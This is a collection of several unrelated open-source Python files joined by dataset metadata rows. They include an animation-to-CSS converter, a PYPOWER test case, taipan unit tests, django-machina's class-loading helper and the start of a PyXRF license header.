from __future__ import with_statement
import os
import sys
from lxml import etree
from copy import deepcopy
from parser import *
from StringIO import StringIO
import logging
import simplejson as json
import re
from collections import deque
from copy import deepcopy
logging.basicConfig(level=logging.DEBUG,
format='%(asctime)s %(levelname)s %(message)s',
datefmt='%Y/%m/%d %H:%M:%S')
class CssElement(dict):
def __init__(self, title=''):
super(CssElement, self).__init__()
self.common_element = {
'position' : ['position', 'absolute'],
'transform': ['-webkit-transform', None],
'origin' : ['-webkit-transform-origin', '0.0px 0.0px'],
}
self.animation_element = {
'name' : ['-webkit-animation-name', None],
'timing' : ['-webkit-animation-timing-function', 'linear'],
'count' : ['-webkit-animation-iteration-count', 'infinite'],
'duration' : ['-webkit-animation-duration', None],
}
self.shape_element = {
'left' : ['left' , None],
'top' : ['top' , None],
'width' : ['width' , None],
'height' : ['height' , None],
}
self.title = title
self.sp = '\n' # splitter
def __str__(self):
content = self.sp.join(['%s: %s;' % (k,v) for k,v in self.iteritems()])
return '%s {%s%s%s}%s' % (self.title, self.sp, content, self.sp, self.sp)
def add_anims_element(self, key, anim_length, has_anim_name):
self.animation_element['name'][1] = key
self.animation_element['duration'][1] = '%fs'%(float(anim_length)/12.0)
if not has_anim_name:
del self.animation_element['name']
self.update(self.animation_element.values())
self.update(self.common_element.values())
def add_shape_element(self, shape_key, shape_table):
def calc_twips_to_pixel(twips):
return '%dpx' % int(round(float(twips)/20))
shape = shape_table[shape_key]
self.shape_element['left'][1] = calc_twips_to_pixel(shape.left)
self.shape_element['top'][1] = calc_twips_to_pixel(shape.top)
self.shape_element['width'][1] = calc_twips_to_pixel(shape.width)
self.shape_element['height'][1] = calc_twips_to_pixel(shape.height)
self.update(self.shape_element.values())
del self.common_element['origin']
def add_origin_element(self, matrix):
self.common_element['transform'][1] = matrix
self.update(self.common_element.values())
class SvgShape(object):
def __init__(self, elem):
self.obj = elem[0]
self.hash = elem[1]
self.left = int(elem[2])
self.top = int(elem[3])
self.width = int(elem[4])
self.height = int(elem[5])
self.symbol = ''
self.edges = []
self.defs =[]
def filename(self, dir_path='.'):
return os.path.join(dir_path, '%s_%s.svg' % (self.obj, self.hash))
class SvgTransform(Transform):
def __init__(self, attrib):
super(SvgTransform,self).__init__()
values = dict([(k,float(attrib[k])) if k in attrib else (k,None) for k in self.MATRIX])
self.set_items(values)
if 'depth' in attrib:
self.depth = int(attrib['depth'])
if 'ctf' in attrib:
self.ctf = ColorTransform([int(ctf.strip()) for ctf in attrib['ctf'].strip('[]').split(',') if ctf.strip().lstrip('-').isdigit()])
if 'clipDepth' in attrib:
self.clipDepth = int(attrib['clipDepth'])
if 'visible' in attrib and attrib['visible'] == 'False':
self.visible = False
def __eq__(self, other):
return [self.sx, self.sy, self.wx, self.wy, self.tx, self.ty, self.get_opacity()]==other
def write_matrix(self):
return self._shorten('matrix(%.6f,%.6f,%.6f,%.6f,%.6f,%.6f)' % self.get_matrix())
def write_matrix3d(self):
return self._shorten('matrix3d(%.6f,%.6f,0,0,%.6f,%.6f,0,0,0,0,1,0,%.6f,%.6f,0,1)' % (self.sx, self.wx, self.wy, self.sy, self.tx/20, self.ty/20))
def write_webkit_transform(self):
return self._shorten('-webkit-transform: %s;' % self.write_matrix3d())
def _shorten(self, str):
return str.replace('.000000', '.0')
def get_opacity(self):
opacity = 1.0
if not self.visible:
opacity = 0.0
else:
if len(self.ctf) == 8:
c = Color([0,0,0,256])
c.transform(self.ctf)
opacity = (float(c.a) / 256.0)
return opacity
def write_visible(self):
return self._shorten('opacity: %.6f;' % self.get_opacity())
class AnimationManager(object):
def __init__(self, dir_path, basefilename):
self.dir_path = dir_path
self.shapes_filepath = self._get_path('shapes')
self.animation_filepath = self._get_path('animation.xml')
self.structure_filepath = self._get_path('structure.xml')
self.cssfilepath = os.path.join('.', basefilename + '.css')
self.htmlfilepath = os.path.join('.', basefilename + '.html')
self.xmlfilename = os.path.basename(basefilename.replace('.svg',''));
def _get_path(self, filename):
return os.path.join(self.dir_path, filename)
def load_shapes(self):
with open(self.shapes_filepath, 'r') as f:
return self.get_shapes(f.readlines())
def get_shapes(self, lines):
shape_table = {}
for line in lines:
elems = line.split(' ')
if len(elems) == 6: # 'shapes'
shape_table[elems[0]] = SvgShape(elems)
return shape_table
def load_animation(self):
root = self._parse_xml(self.animation_filepath)
return self.get_animation(root)
def get_animation(self, root):
anim_table = {}
for anim in root.xpath('//animation'):
key = anim.attrib['key'][:-2]
frames = anim.findall('frame')
anim_table[key] = [SvgTransform(frame.attrib) for frame in frames]
return anim_table
def load_structure(self, shape_table, parser_shapes):
root = self._parse_xml(self.structure_filepath)
return self.get_structure(root, shape_table, parser_shapes)
def get_structure(self, root, shape_table, anim_table, ctfsArray, parser_shapes, mcname=None, key_prefix=""):
def get_parent_key(elem):
parent = elem.getparent()
if parent is not None and parent.attrib.has_key('class'):
p_attrib_cls = parent.attrib['class']
s = re.search('obj\d+', p_attrib_cls)
if s is not None:
return s.group()
else:
return ''
def update_elem(elem, key, name, hasClipDepth):
elem.tag = 'div'
elem.attrib.clear()
elem.attrib['class'] = key
if name is not None :
elem.attrib['id'] = name
if hasClipDepth:
elem.attrib['style'] = 'display:none;'
structure_table = {}
if mcname is None:
root_elem = root
else:
r = root.xpath('//part[@name="%s"]'%mcname)
if r is None:
root_elem = root
else:
root_elem = r[0]
for elem in root.xpath('//part'):
if 'key' in elem.attrib:
key = elem.attrib['key']
objId = LUtil.objectID_from_key(key)
depth = elem.attrib['depth']
hasClipDepth = 'clipDepth' in elem.attrib
name = elem.attrib['name'] if 'name' in elem.attrib else None
ctf = json.loads(elem.attrib['ctf'])
if len(ctf) > 1:
ctfsArray.append({key:ctf})
key_depth = LUtil.make_key_string(objId, prefix=key_prefix, suffix=depth)
structure_table[key_depth] = SvgTransform(elem.attrib)
update_elem(elem, key_depth, name, hasClipDepth)
k = objId[3:]
if (len(elem) == 0) and (k in parser_shapes):
shape_key = LUtil.make_key_string(objId, prefix=key_prefix, suffix='shape')
parent_key = get_parent_key(elem)
childdiv = etree.Element('div')
childdiv.set('class', shape_key)
structure_table[shape_key] = SvgTransform(childdiv.attrib)
svgelem = Parser.str_shape_as_svg(parser_shapes[k], ctfsArray, parent_key)
childdiv.append(svgelem)
elem.append(childdiv)
structure_tree = deepcopy(root_elem)
return structure_table, structure_tree
def _parse_xml(self, filepath):
with open(filepath, 'r') as f:
return etree.parse(f)
return None
def _remove_deplicated_keyframes(self, anim_elements):
anim_buffer = deque()
result = []
for percent, transform in anim_elements:
anim_buffer.append((percent, transform))
if len(anim_buffer) == 3:
if anim_buffer[0][1] == anim_buffer[1][1] and anim_buffer[0][1] == anim_buffer[2][1]:
anim_buffer = deque((anim_buffer[0], anim_buffer[2]))
else:
result.append(anim_buffer.popleft())
result.extend(list(anim_buffer))
return result
def _interpolate_keyframes(self, anim_elements, eps=0.0001):
result = []
old_transform = None
for i, (percent, transform) in enumerate(anim_elements):
if old_transform is not None:
if (not old_transform.visible and transform.visible):
temp_transform = deepcopy(transform)
temp_transform.visible = old_transform.visible
result.append((percent - eps, temp_transform))
elif (old_transform.visible and not transform.visible):
result.append((percent - eps, old_transform))
result.append((percent, transform))
old_transform = transform
if len(result) > 0:
result.append((100.0, result[0][1])) # 100% animation
return result
def _make_keyframes(self, anim_table, key_prefix='', sp='\n'):
keyframes = []
for key, value in anim_table.iteritems():
anim_length = len(value)
anim_elements = [((float(i*100)/float(anim_length)), a) for i,a in enumerate(value)]
anim_list = ['%f%% { %s %s }' % (percent, a.write_webkit_transform(), a.write_visible()) for percent, a in self._interpolate_keyframes(self._remove_deplicated_keyframes(anim_elements))]
anim = sp.join(anim_list)
keyframes.append(sp.join(['@-webkit-keyframes %s {'%(key), anim, '}']))
return (sp+sp).join(keyframes)
def _make_transform(self, structure_table, shape_table, anim_table, key_prefix='', has_anim_name=True, sp='\n'):
result = []
for key, structure in structure_table.iteritems():
elem = CssElement(title='.%s'%key)
transform = ('-webkit-transform', structure.write_matrix())
if key in anim_table:
anim_length = len(anim_table[key])
elem.add_anims_element(key, anim_length, has_anim_name)
shape_key = LUtil.objectID_from_key(key)
if key.endswith('shape') and shape_key in shape_table:
elem.add_shape_element(shape_key, shape_table)
elem.add_origin_element(structure.write_matrix())
result.append(str(elem))
return (sp+sp).join(result)
def write_html(self, structure_tree, cssfilepath):
template = '''<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="ja" xml:lang="ja">
<head>
<meta http-equiv="Content-Type" content="application/xhtml+xml; charset=utf-8"></meta>
<link href="%s" type="text/css" rel="stylesheet"></link>
<title>lightning</title>
</head>
<body>
%s
</body>
</html>
'''
html = template % (cssfilepath, etree.tostring(structure_tree, pretty_print=True))
return html
def write_div(self, structure_tree):
html = "%s" % (etree.tostring(structure_tree, pretty_print=True))
return html
def write_css(self, structure_table, shape_table, anim_table, key_prefix='', has_anim_name=True, sp='\n\n'):
elem = CssElement(title='div')
css = sp.join([self._make_keyframes(anim_table, key_prefix), self._make_transform(structure_table, shape_table, anim_table, key_prefix, has_anim_name)])
return 'svg { display:block; }\n' + css
def _write(self, filepath, content):
with open(filepath, 'w') as f:
f.write(content)
| mit | -3,026,379,057,328,387,000 | 39.092697 | 197 | 0.577664 | false |
jayantk/jklol | scripts/sequence/generate_emission_features.py | 1 | 1090 | #!/usr/local/lib/python2.6
import re
import sys
filename = sys.argv[1]
def generate_string_features(word, label):
dict = {}
'''
patterns = ['\d$', '\d\d$', '\d\d\d+$', '\d?\d?:\d\d$',
'[0-9:]+$', '[A-Z]', '[A-Z]$', '[A-Z][A-Z]$',
'[A-Z]+$', '[^0-9A-Za-z]+$', '[^0-9]+$', '[A-Za-z]+$',
'[a-z]+$']
for pattern in patterns:
if re.match(pattern, word):
dict['regex=' + pattern + '_label=' + label] = 1
'''
dict['bias_label=' + label] = 1
dict['word=' + word.lower() + '_label=' + label] = 1
return dict
words = set()
labels = set()
with open(filename, 'r') as f:
for line in f:
chunks = line.strip().split(" ")
for i in range(0, len(chunks), 2):
words.add(chunks[i].strip())
labels.add(chunks[i + 1].strip())
for word in words:
for label in labels:
features = generate_string_features(word, label)
for feature in features.keys():
print "%s@#@#@%s@#@#@%s@#@#@%d" % (word, label, feature, features[feature])
| bsd-2-clause | 780,676,244,806,136,700 | 26.25 | 87 | 0.478899 | false |
praba230890/PYPOWER | pypower/t/t_case_ext.py | 2 | 4105 | # Copyright (c) 1996-2015 PSERC. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
"""Case data in external format.
"""
from numpy import array, ones, arange, r_
def t_case_ext():
"""Case data in external format used to test C{ext2int} and C{int2ext}.
"""
ppc = {}
## PYPOWER Case Format : Version 2
ppc['version'] = '2'
##----- Power Flow Data -----##
## system MVA base
ppc['baseMVA'] = 100.0
## bus data
# bus_i type Pd Qd Gs Bs area Vm Va baseKV zone Vmax Vmin
ppc['bus'] = array([
[1, 3, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[2, 2, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[30, 2, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[4, 1, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[5, 1, 90, 30, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[20, 4, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[6, 1, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[7, 1, 100, 35, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[8, 1, 0, 0, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9],
[9, 1, 125, 50, 0, 0, 1, 1, 0, 345, 1, 1.1, 0.9]
])
## generator data
# bus, Pg, Qg, Qmax, Qmin, Vg, mBase, status, Pmax, Pmin, Pc1, Pc2,
# Qc1min, Qc1max, Qc2min, Qc2max, ramp_agc, ramp_10, ramp_30, ramp_q, apf
ppc['gen'] = array([
[30, 85, 0, 300, -300, 1, 100, 1, 270, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[2, 163, 0, 300, -300, 1, 100, 1, 300, 10, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[20, 20, 0, 300, -300, 1, 100, 1, 200, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 300, -300, 1, 100, 1, 250, 90, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]
], float)
## branch data
# fbus, tbus, r, x, b, rateA, rateB, rateC, ratio, angle, status, angmin, angmax
ppc['branch'] = array([
[1, 4, 0, 0.0576, 0, 0, 250, 250, 0, 0, 1, -360, 360],
[4, 5, 0.017, 0.092, 0.158, 0, 250, 250, 0, 0, 1, -360, 360],
[5, 6, 0.039, 0.17, 0.358, 150, 150, 150, 0, 0, 1, -360, 360],
[30, 6, 0, 0.0586, 0, 0, 300, 300, 0, 0, 1, -360, 360],
[6, 7, 0.0119, 0.1008, 0.209, 40, 150, 150, 0, 0, 1, -360, 360],
[7, 8, 0.0085, 0.072, 0.149, 250, 250, 250, 0, 0, 1, -360, 360],
[8, 20, 0, 0.1, 0, 250, 250, 250, 0, 0, 1, -360, 360],
[8, 2, 0, 0.0625, 0, 250, 250, 250, 0, 0, 1, -360, 360],
[8, 9, 0.032, 0.161, 0.306, 250, 250, 250, 0, 0, 1, -360, 360],
[9, 4, 0.01, 0.085, 0.176, 250, 250, 250, 0, 0, 1, -360, 360]
])
##----- OPF Data -----##
## area data
# area refbus
ppc['areas'] = array([
[2, 20],
[1, 5]
], float)
## generator cost data
# 1 startup shutdown n x1 y1 ... xn yn
# 2 startup shutdown n c(n-1) ... c0
ppc['gencost'] = array([
[2, 0, 0, 2, 15, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 4, 0, 0, 100, 2500, 200, 5500, 250, 7250],
[2, 0, 0, 2, 20, 0, 0, 0, 0, 0, 0, 0],
[1, 0, 0, 4, 0, 0, 100, 2000, 200, 4403.5, 270, 6363.5]
])
ppc['A'] = array([
[1, 2, 3, 4, 5, 0, 7, 8, 9, 10, 11, 12, 13, 14, 15, 0, 17, 18, 19, 20, 21, 22, 0, 24, 25, 26, 0, 28, 29, 30],
[2, 4, 6, 8, 10, 0, 14, 16, 18, 20, 22, 24, 26, 28, 30, 0, 34, 36, 38, 40, 42, 44, 0, 48, 50, 52, 0, 56, 58, 60]
], float)
ppc['N'] = array([
[30, 29, 28, 27, 26, 25, 24, 23, 22, 21, 20, 19, 18, 17, 16, 15, 14, 13, 12, 11, 10, 9, 8, 7, 6, 5, 4, 3, 2, 1],
[60, 58, 56, 54, 52, 50, 48, 46, 44, 42, 40, 38, 36, 34, 32, 30, 28, 26, 24, 22, 20, 18, 16, 14, 12, 10, 8, 6, 4, 2],
], float)
ppc['xbus'] = arange(100, dtype=float).reshape((10, 10))
ppc['xgen'] = arange(16, dtype=float).reshape((4, 4))
ppc['xbranch'] = ppc['xbus'].copy()
ppc['xrows'] = r_[ppc['xbranch'][:, :4], ppc['xgen'], ppc['xbus'][:, :4], -ones((2, 4))]
ppc['xcols'] = ppc['xrows'].T
ppc['x'] = { 'more': ppc['xgen'] }
return ppc
| bsd-3-clause | -4,254,840,702,159,437,000 | 40.887755 | 125 | 0.436541 | false |
Xion/taipan | tests/test_functional/test_functions.py | 1 | 11928 | """
Tests for the .functional.functions module.
"""
from collections import namedtuple
from contextlib import contextmanager
from taipan.testing import TestCase
import taipan.functional.functions as __unit__
# Constant functions
class _ConstantFunction(TestCase):
EMPTY_TUPLE = ()
EMPTY_LIST = []
DIFFERENT_EMPTY_LIST = []
LIST = list(range(5))
LIST_COPY = list(LIST)
EMPTY_DICT = {}
DIFFERENT_EMPTY_DICT = {}
DICT = dict(zip('abcde', range(5)))
DICT_COPY = dict(DICT)
OBJECT = object()
DIFFERENT_OBJECT = object()
class Identity(_ConstantFunction):
def test_values(self):
identity = __unit__.identity()
self.assertIsNone(identity(None))
self.assertIs(0, identity(0))
self.assertIs(self.EMPTY_TUPLE, identity(self.EMPTY_TUPLE))
def test_empty_lists(self):
identity = __unit__.identity()
self.assertIs(self.EMPTY_LIST, identity(self.EMPTY_LIST))
self.assertIsNot(self.DIFFERENT_EMPTY_LIST, identity(self.EMPTY_LIST))
def test_lists(self):
identity = __unit__.identity()
self.assertIs(self.LIST, identity(self.LIST))
self.assertIsNot(self.LIST_COPY, identity(self.LIST))
def test_empty_dicts(self):
identity = __unit__.identity()
self.assertIs(self.EMPTY_DICT, identity(self.EMPTY_DICT))
self.assertIsNot(self.DIFFERENT_EMPTY_DICT, identity(self.EMPTY_DICT))
def test_dicts(self):
identity = __unit__.identity()
self.assertIs(self.DICT, identity(self.DICT))
self.assertIsNot(self.DICT_COPY, identity(self.DICT))
def test_object(self):
identity = __unit__.identity()
self.assertIs(self.OBJECT, identity(self.OBJECT))
self.assertIsNot(self.DIFFERENT_OBJECT, identity(self.OBJECT))
class Const(_ConstantFunction):
def test_values(self):
self.assertIsNone(__unit__.const(None)())
self.assertIs(0, __unit__.const(0)())
self.assertIs(self.EMPTY_TUPLE, __unit__.const(self.EMPTY_TUPLE)())
def test_empty_lists(self):
empty_list = __unit__.const(self.EMPTY_LIST)
self.assertIs(self.EMPTY_LIST, empty_list())
self.assertIsNot(self.DIFFERENT_EMPTY_LIST, empty_list())
def test_lists(self):
list_ = __unit__.const(self.LIST)
self.assertIs(self.LIST, list_())
self.assertIsNot(self.DIFFERENT_EMPTY_LIST, list_())
def test_empty_dicts(self):
empty_dict = __unit__.const(self.EMPTY_DICT)
self.assertIs(self.EMPTY_DICT, empty_dict())
self.assertIsNot(self.DIFFERENT_EMPTY_DICT, empty_dict())
def test_dicts(self):
dict_ = __unit__.const(self.DICT)
self.assertIs(self.DICT, dict_())
self.assertIsNot(self.DICT_COPY, dict_())
def test_object(self):
object_ = __unit__.const(self.OBJECT)
self.assertIs(self.OBJECT, object_())
self.assertIsNot(self.DIFFERENT_OBJECT, object_())
class PredefinedConstantFunctions(_ConstantFunction):
def test_true(self):
self._assertConstantFunction(__unit__.true(), self.assertTrue)
def test_false(self):
self._assertConstantFunction(__unit__.false(), self.assertFalse)
def test_none(self):
self._assertConstantFunction(__unit__.none(), self.assertIsNone)
def test_zero(self):
self._assertConstantFunction(__unit__.zero(), self.assertZero)
def test_one(self):
self._assertConstantFunction(__unit__.one(),
lambda res: self.assertEquals(1, res))
def test_empty(self):
self._assertConstantFunction(__unit__.empty(), self.assertEmpty)
# Utility functions
def _assertConstantFunction(self, func, assertion):
assertion(func())
assertion(func("extraneous positional argument"))
assertion(func(foo="extraneous keyword argument"))
assertion(func("extraneous positional argument",
foo="extraneous keyword argument"))
# Unary functions
class AttrFunc(TestCase):
CLASS = namedtuple('Foo', ['foo', 'bar'])
SINGLE_NESTED_OBJECT = CLASS(foo=1, bar='baz')
DOUBLY_NESTED_OBJECT = CLASS(foo=CLASS(foo=1, bar=2), bar='a')
DEFAULT = 42
def test_no_args(self):
with self.assertRaises(TypeError):
__unit__.attr_func()
def test_none(self):
with self.assertRaises(TypeError):
__unit__.attr_func(None)
def test_some_object(self):
with self.assertRaises(TypeError):
__unit__.attr_func(object())
def test_string__empty(self):
with self._assertAttributeNameValueError():
__unit__.attr_func('')
def test_string__with_spaces(self):
with self._assertAttributeNameValueError():
__unit__.attr_func('foo bar')
def test_string__number(self):
with self._assertAttributeNameValueError():
__unit__.attr_func('42')
def test_single_attr__good(self):
func = __unit__.attr_func('foo')
self.assertEquals(
self.SINGLE_NESTED_OBJECT.foo, func(self.SINGLE_NESTED_OBJECT))
self.assertEquals(
self.DOUBLY_NESTED_OBJECT.foo, func(self.DOUBLY_NESTED_OBJECT))
def test_single_attr__bad(self):
func = __unit__.attr_func('doesnt_exist')
with self.assertRaises(AttributeError):
func(self.SINGLE_NESTED_OBJECT)
with self.assertRaises(AttributeError):
func(self.DOUBLY_NESTED_OBJECT)
def test_single_attr__with_dot(self):
func = __unit__.attr_func('foo.bar')
self.assertEquals(
self.DOUBLY_NESTED_OBJECT.foo.bar, func(self.DOUBLY_NESTED_OBJECT))
def test_two_attrs__good(self):
func = __unit__.attr_func('foo', 'bar')
self.assertEquals(
self.DOUBLY_NESTED_OBJECT.foo.bar, func(self.DOUBLY_NESTED_OBJECT))
def test_two_attrs__bad(self):
func = __unit__.attr_func('doesnt_exist', 'foo')
with self.assertRaises(AttributeError):
func(self.DOUBLY_NESTED_OBJECT)
def test_single_attr__good__with_default(self):
func = __unit__.attr_func('foo', default=self.DEFAULT)
self.assertEquals(
self.SINGLE_NESTED_OBJECT.foo, func(self.SINGLE_NESTED_OBJECT))
self.assertEquals(
self.DOUBLY_NESTED_OBJECT.foo, func(self.DOUBLY_NESTED_OBJECT))
def test_single_attr__bad__with_default(self):
func = __unit__.attr_func('doesnt_exist', default=self.DEFAULT)
self.assertEquals(self.DEFAULT, func(self.SINGLE_NESTED_OBJECT))
self.assertEquals(self.DEFAULT, func(self.DOUBLY_NESTED_OBJECT))
def test_two_attrs__good__with_default(self):
func = __unit__.attr_func('foo', 'bar', default=self.DEFAULT)
self.assertEquals(
self.DOUBLY_NESTED_OBJECT.foo.bar, func(self.DOUBLY_NESTED_OBJECT))
def test_two_attrs__bad__with_default(self):
func = __unit__.attr_func('foo', 'doesnt_exist', default=self.DEFAULT)
self.assertEquals(self.DEFAULT, func(self.DOUBLY_NESTED_OBJECT))
# Utility functions
@contextmanager
def _assertAttributeNameValueError(self):
with self.assertRaises(ValueError) as r:
yield r
msg = str(r.exception)
self.assertIn("not", msg)
self.assertIn("valid", msg)
class KeyFunc(TestCase):
SINGLY_NESTED_DICT = dict(foo=1, bar='baz')
DOUBLY_NESTED_DICT = dict(foo=dict(foo=1, bar=2), bar='a')
DEFAULT = 42
def test_no_args(self):
with self.assertRaises(TypeError):
__unit__.key_func()
def test_none(self):
with self.assertRaises(TypeError):
__unit__.key_func(None)
def test_some_object(self):
with self.assertRaises(TypeError):
__unit__.key_func(object())
def test_single_key__good(self):
func = __unit__.key_func('foo')
self.assertEquals(
self.SINGLY_NESTED_DICT['foo'], func(self.SINGLY_NESTED_DICT))
self.assertEquals(
self.DOUBLY_NESTED_DICT['foo'], func(self.DOUBLY_NESTED_DICT))
def test_single_key__bad(self):
func = __unit__.key_func('doesnt_exist')
with self.assertRaises(LookupError):
func(self.SINGLY_NESTED_DICT)
with self.assertRaises(LookupError):
func(self.DOUBLY_NESTED_DICT)
def test_two_keys__good(self):
func = __unit__.key_func('foo', 'bar')
self.assertEquals(
self.DOUBLY_NESTED_DICT['foo']['bar'],
func(self.DOUBLY_NESTED_DICT))
def test_two_keys__bad(self):
func = __unit__.key_func('doesnt_exist', 'foo')
with self.assertRaises(LookupError):
func(self.DOUBLY_NESTED_DICT)
def test_single_key__good__with_default(self):
func = __unit__.key_func('foo', default=self.DEFAULT)
self.assertEquals(
self.SINGLY_NESTED_DICT['foo'], func(self.SINGLY_NESTED_DICT))
self.assertEquals(
self.DOUBLY_NESTED_DICT['foo'], func(self.DOUBLY_NESTED_DICT))
def test_single_key__bad__with_default(self):
func = __unit__.key_func('doesnt_exist', default=self.DEFAULT)
self.assertEquals(self.DEFAULT, func(self.SINGLY_NESTED_DICT))
self.assertEquals(self.DEFAULT, func(self.DOUBLY_NESTED_DICT))
def test_two_keys__good__with_default(self):
func = __unit__.key_func('foo', 'bar', default=self.DEFAULT)
self.assertEquals(
self.DOUBLY_NESTED_DICT['foo']['bar'],
func(self.DOUBLY_NESTED_DICT))
def test_two_keys__bad__with_default(self):
func = __unit__.key_func('foo', 'doesnt_exist', default=self.DEFAULT)
self.assertEquals(self.DEFAULT, func(self.DOUBLY_NESTED_DICT))
class Dotcall(TestCase):
INSTANCE_RETURN_VALUE = 42
CLASS_RETURN_VALUE = 13
ARGUMENT = 'foobar'
def test_no_args(self):
with self.assertRaises(TypeError):
__unit__.dotcall()
def test_none(self):
with self.assertRaises(TypeError):
__unit__.dotcall(None)
def test_some_object(self):
with self.assertRaises(TypeError):
__unit__.dotcall(object())
def test_string__no_args__class_instance(self):
call = __unit__.dotcall('foo')
instance = self._create_class_instance()
self.assertEquals(Dotcall.INSTANCE_RETURN_VALUE, call(instance))
def test_string__no_args__class(self):
call = __unit__.dotcall('bar')
class_ = self._create_class()
self.assertEquals(Dotcall.CLASS_RETURN_VALUE, call(class_))
def test_string__no_args__module(self):
call = __unit__.dotcall(__unit__.true.__name__)
self.assertResultsEqual(__unit__.true(), call(__unit__))
def test_string__with_args__class_instance(self):
call = __unit__.dotcall('baz', self.ARGUMENT)
instance = self._create_class_instance()
self.assertEquals(self.ARGUMENT, call(instance))
def test_string__with_args__class(self):
call = __unit__.dotcall('qux', self.ARGUMENT)
class_ = self._create_class()
self.assertEquals(self.ARGUMENT, call(class_))
def test_string__with_args__module(self):
call = __unit__.dotcall(__unit__.const.__name__, self.ARGUMENT)
self.assertResultsEqual(__unit__.const(self.ARGUMENT), call(__unit__))
# Utility function
def _create_class(self):
class Class(object):
def foo(self):
return Dotcall.INSTANCE_RETURN_VALUE
@classmethod
def bar(cls):
return Dotcall.CLASS_RETURN_VALUE
def baz(self, arg):
return arg
@classmethod
def qux(cls, arg):
return arg
return Class
def _create_class_instance(self):
Class = self._create_class()
return Class()
| bsd-2-clause | -944,069,147,361,866,900 | 32.505618 | 79 | 0.617622 | false |
ellmetha/django-machina | machina/core/loading.py | 1 | 3900 | import sys
import traceback
from django.conf import settings
class AppNotFoundError(Exception):
pass
class ClassNotFoundError(Exception):
pass
def get_class(module_label, classname):
return get_classes(module_label, [classname, ])[0]
def get_classes(module_label, classnames):
""" Imports a set of classes from a given module.
Usage::
get_classes('forum.models', ['Forum', 'ForumReadTrack', ])
"""
app_label = module_label.split('.')[0]
app_module_path = _get_app_module_path(module_label)
if not app_module_path:
raise AppNotFoundError('No app found matching \'{}\''.format(module_label))
# Determines the full module path by appending the module label
# to the base package path of the considered application.
module_path = app_module_path
if '.' in app_module_path:
base_package = app_module_path.rsplit('.' + app_label, 1)[0]
module_path = '{}.{}'.format(base_package, module_label)
# Try to import this module from the related app that is specified
# in the Django settings.
local_imported_module = _import_module(module_path, classnames)
# If the module we tried to import is not located inside the machina
# vanilla apps, try to import it from the corresponding machina app.
machina_imported_module = None
if not app_module_path.startswith('machina.apps'):
machina_imported_module = _import_module(
'{}.{}'.format('machina.apps', module_label), classnames,
)
if local_imported_module is None and machina_imported_module is None:
raise AppNotFoundError('Error importing \'{}\''.format(module_path))
# Any local module is prioritized over the corresponding machina module
imported_modules = [
m for m in (local_imported_module, machina_imported_module) if m is not None
]
return _pick_up_classes(imported_modules, classnames)
def _import_module(module_path, classnames):
""" Tries to import the given Python module path. """
try:
imported_module = __import__(module_path, fromlist=classnames)
return imported_module
except ImportError:
# In case of an ImportError, the module being loaded generally does not exist. But an
# ImportError can occur if the module being loaded exists and another import located inside
# it failed.
#
# In order to provide a meaningfull traceback, the execution information can be inspected in
# order to determine which case to consider. If the execution information provides more than
# a certain amount of frames, this means that an ImportError occured while loading the
# initial Python module.
__, __, exc_traceback = sys.exc_info()
frames = traceback.extract_tb(exc_traceback)
if len(frames) > 1:
raise
def _pick_up_classes(modules, classnames):
""" Given a list of class names to retrieve, try to fetch them from the specified list of
modules and returns the list of the fetched classes.
"""
klasses = []
for classname in classnames:
klass = None
for module in modules:
if hasattr(module, classname):
klass = getattr(module, classname)
break
if not klass:
raise ClassNotFoundError('Error fetching \'{}\' in {}'.format(
classname, str([module.__name__ for module in modules]))
)
klasses.append(klass)
return klasses
def _get_app_module_path(module_label):
""" Given a module label, loop over the apps specified in the INSTALLED_APPS to find the
corresponding application module path.
"""
app_name = module_label.rsplit('.', 1)[0]
for app in settings.INSTALLED_APPS:
if app.endswith('.' + app_name) or app == app_name:
return app
return None
| bsd-3-clause | 3,359,601,575,584,082,400 | 34.779817 | 100 | 0.65641 | false |
ericdill/PyXRF | pyxrf/model/guessparam.py | 1 | 27631 | # ######################################################################
# Copyright (c) 2014, Brookhaven Science Associates, Brookhaven #
# National Laboratory. All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions #
# are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of the Brookhaven Science Associates, Brookhaven #
# National Laboratory nor the names of its contributors may be used #
# to endorse or promote products derived from this software without #
# specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, #
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR #
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #
